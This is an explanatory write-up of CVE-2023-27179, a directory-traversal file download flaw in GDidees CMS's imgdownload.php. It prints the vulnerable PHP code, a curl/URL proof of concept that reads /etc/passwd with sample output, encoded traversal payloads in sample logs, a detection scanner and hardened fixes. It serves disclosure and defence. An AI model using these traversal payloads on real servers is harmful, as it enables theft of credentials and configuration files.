GDidees CMS is a content management system that’s relatively popular for building small websites and personal projects. In early 2023, a critical vulnerability was disclosed in versions up to v3.9.1, allowing attackers to download arbitrary files from the server. This security issue (CVE-2023-27179) exists in the file /_admin/imgdownload.php and stems from poor input handling and improper file access control.

In this article, we’ll break down what this vulnerability is all about, how it works, and how an attacker can exploit it. We’ll use simple language—no tricky jargon—and include code snippets and references to help you understand the risk and remediation.

- CVE ID: CVE-2023-27179
- Affected versions: GDidees CMS up to v3.9.1
- Affected endpoint: /_admin/imgdownload.php

What’s the Problem?

The script imgdownload.php is supposed to let administrators download image files from the server. However, it doesn’t properly check or sanitize the filename parameter. This poor input validation makes it possible for attackers to request any file from the server, including sensitive files like /etc/passwd, configuration files, or other data that should never leave the server.

How the Vulnerability Works

Let's look at the code that causes the problem. In simplified form, the logic in imgdownload.php looks roughly like this:

<?php
// _admin/imgdownload.php

if(isset($_GET['filename'])) {
    $filename = $_GET['filename'];
    $file = "../uploads/images/" . $filename;

    if(file_exists($file)) {
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . basename($file) . '"');
        readfile($file);
    } else {
        echo "File does not exist.";
    }
}
?>

Missing input validation

- The code joins ../uploads/images/ with the user-supplied filename and serves it up if it exists.
- Attackers can use directory traversal (e.g., ../../../../../etc/passwd) to escape the image uploads folder and read any file the webserver can access.

PoC: Exploiting CVE-2023-27179

Here’s a proof-of-concept (PoC) that shows how an attacker could download the server’s /etc/passwd file (on Linux systems):

Example Exploit: Download /etc/passwd

Just use your browser or an HTTP tool like curl with the following URL:

http://victim-site.com/_admin/imgdownload.php?filename=../../../../../../etc/passwd

Or from the command line:

curl "http://victim-site.com/_admin/imgdownload.php?filename=../../../../../../etc/passwd"

If there is no input sanitization in place, the server will respond with the contents of /etc/passwd.

Example of the output you might see:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
...

Impact

- If the web server process can read a file, the attacker can probably grab it.
- The downloaded files (password databases, configuration files, credentials) give an attacker the information needed for further attacks (escalation, code execution, etc.).
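Since the PoC above leaves an obvious trace in the web server access log, defenders can look for it. The following is an added example, not part of the original write-up or of the GDidees project: a small PHP CLI scanner that flags requests to _admin/imgdownload.php whose filename parameter contains a directory-traversal sequence, including URL-encoded and double-encoded forms. The log lines are constructed samples in Apache combined format (addresses from the documentation ranges), and the script assumes PHP 8 for str_ends_with and str_contains.

```php
<?php
// Added example (not the page's or the project's code): scan access-log lines
// for traversal attempts against _admin/imgdownload.php.
declare(strict_types=1);

// Constructed sample log, not real traffic.
const SAMPLE_LOG = <<<'LOG'
203.0.113.10 - - [11/Apr/2023:12:20:01 +0000] "GET /_admin/imgdownload.php?filename=logo.png HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.10 - - [11/Apr/2023:12:20:05 +0000] "GET /_admin/imgdownload.php?filename=../../../../../../etc/passwd HTTP/1.1" 200 2017 "-" "curl/7.88.1"
203.0.113.11 - - [11/Apr/2023:12:21:09 +0000] "GET /_admin/imgdownload.php?filename=..%2F..%2F..%2Fconfig.php HTTP/1.1" 200 880 "-" "python-requests/2.28"
203.0.113.12 - - [11/Apr/2023:12:22:30 +0000] "GET /_admin/imgdownload.php?filename=%252e%252e%252fetc%252fshadow HTTP/1.1" 404 20 "-" "curl/7.88.1"
198.51.100.7 - - [11/Apr/2023:12:23:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 4401 "-" "Mozilla/5.0"
LOG;

/**
 * Return the fully decoded filename parameter of an imgdownload.php request,
 * or null when the line is not such a request.
 */
function extractFilenameParam(string $line): ?string
{
    if (!preg_match('#"(?:GET|POST|HEAD) (\S+) HTTP/#', $line, $m)) {
        return null;
    }
    $url = parse_url($m[1]);
    if (!isset($url['path'], $url['query'])
        || !str_ends_with($url['path'], '/_admin/imgdownload.php')) {
        return null;
    }
    parse_str($url['query'], $params);
    if (!isset($params['filename'])) {
        return null;
    }
    // parse_str decodes once; decode again so double-encoded
    // sequences (%252e -> %2e -> .) are also caught.
    $value = (string) $params['filename'];
    for ($i = 0; $i < 2; $i++) {
        $decoded = rawurldecode($value);
        if ($decoded === $value) {
            break;
        }
        $value = $decoded;
    }
    return $value;
}

/** True when a decoded filename tries to leave the uploads directory. */
function isTraversal(string $filename): bool
{
    if ($filename === '') {
        return false;
    }
    // A ".." path segment anywhere, an absolute path, or an embedded NUL byte.
    return preg_match('#(^|[\\/\\\\])\.\.([\\/\\\\]|$)#', $filename) === 1
        || $filename[0] === '/'
        || $filename[0] === '\\'
        || str_contains($filename, "\0");
}

/** Scan a log blob and return one finding per suspicious request. */
function findTraversalRequests(string $log): array
{
    $findings = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $name = extractFilenameParam($line);
        if ($name !== null && isTraversal($name)) {
            $findings[] = ['ip' => strtok($line, ' '), 'filename' => $name];
        }
    }
    return $findings;
}

foreach (findTraversalRequests(SAMPLE_LOG) as $f) {
    printf("ALERT %s requested %s\n", $f['ip'], $f['filename']);
}
```

Run against the sample, the scanner reports the second, third and fourth lines and ignores the legitimate logo.png download and the unrelated index.php request. Note that the 404 on the double-encoded request is still worth an alert: a failed attempt shows someone is probing the endpoint.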

How to Fix It

1. Update: upgrade to the latest version of GDidees CMS as soon as a patch is published.

2. Patch the vulnerable code. Add input validation to reject directory traversal and sanitize the filename input. For example:

<?php
if(isset($_GET['filename'])) {
    $filename = basename($_GET['filename']); // basename removes directory paths
    $file = "../uploads/images/" . $filename;

    if(file_exists($file)) {
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . basename($file) . '"');
        readfile($file);
    } else {
        echo "File does not exist.";
    }
}
?>

3. Harden server permissions: Limit the web server’s rights so it can’t access sensitive files outside the web directory.
4. Restrict access to /_admin/ via .htaccess or other measures.
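The basename() fix in step 2 neutralizes the traversal described in the "How the Vulnerability Works" section, but it still serves any file that happens to sit in the uploads directory and relies on the concatenated path never being resolved elsewhere. The following is an added example, not the project's own patched code, of a defense-in-depth version of the handler: it rejects anything that is not a plain file name, restricts downloads to image extensions, and canonicalizes the path with realpath() so that symlinks or other tricks cannot point outside the uploads directory. It assumes the uploads directory is ../uploads/images relative to the script, as in the original snippet, and that the image types listed are the ones meant to be downloadable.

```php
<?php
// Added example (not the GDidees CMS project's code): a hardened
// _admin/imgdownload.php that confines downloads to the uploads directory.
declare(strict_types=1);

// Assumption: same layout as the original snippet.
const UPLOAD_DIR = __DIR__ . '/../uploads/images';
// Assumption: only these image types should ever be downloadable.
const ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif', 'webp'];

/**
 * Resolve a user-supplied name to an absolute path inside UPLOAD_DIR.
 * Returns null when the name is empty, contains a separator or NUL byte,
 * has a disallowed extension, or resolves outside the uploads directory.
 */
function resolveUploadPath(string $requested): ?string
{
    // Only a bare file name is acceptable: no slashes, backslashes or NUL.
    if ($requested === '' || preg_match('/[\\/\\\\\0]/', $requested) === 1) {
        return null;
    }
    // basename('..') is '..', so dot-only names must be rejected explicitly.
    if ($requested === '.' || $requested === '..') {
        return null;
    }
    $ext = strtolower(pathinfo($requested, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXTENSIONS, true)) {
        return null;
    }

    $base = realpath(UPLOAD_DIR);
    $full = realpath(UPLOAD_DIR . '/' . $requested);
    if ($base === false || $full === false) {
        return null; // directory or file does not exist
    }
    // The canonical path must lie strictly below the uploads directory,
    // which also catches symlinks that point elsewhere.
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return is_file($full) ? $full : null;
}

$file = resolveUploadPath((string) ($_GET['filename'] ?? ''));
if ($file === null) {
    http_response_code(404);
    echo "File does not exist.";
    exit;
}

header('Content-Type: application/octet-stream');
header('Content-Length: ' . (string) filesize($file));
header('Content-Disposition: attachment; filename="' . basename($file) . '"');
header('X-Content-Type-Options: nosniff');
readfile($file);
```

The handler deliberately answers every rejected request with the same 404 message so that it does not reveal whether a file outside the uploads directory exists. It also does nothing about authentication: keep step 4 in place so that unauthenticated users cannot reach /_admin/ at all.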

References

- CVE-2023-27179 at NVD
- Exploit details on Exploit-DB
- Packet Storm Security advisory

Summary

CVE-2023-27179 is a harsh reminder to never trust user input. Arbitrary file download bugs are cheap and effective for attackers. Website admins using GDidees CMS should update their installations and review any admin-facing download code for similar issues.

If you spot this bug on a website, let the owner know ASAP—they could be one request away from getting pwned.

Timeline

Published on: 04/11/2023 12:15:00 UTC
Last modified on: 04/17/2023 17:15:00 UTC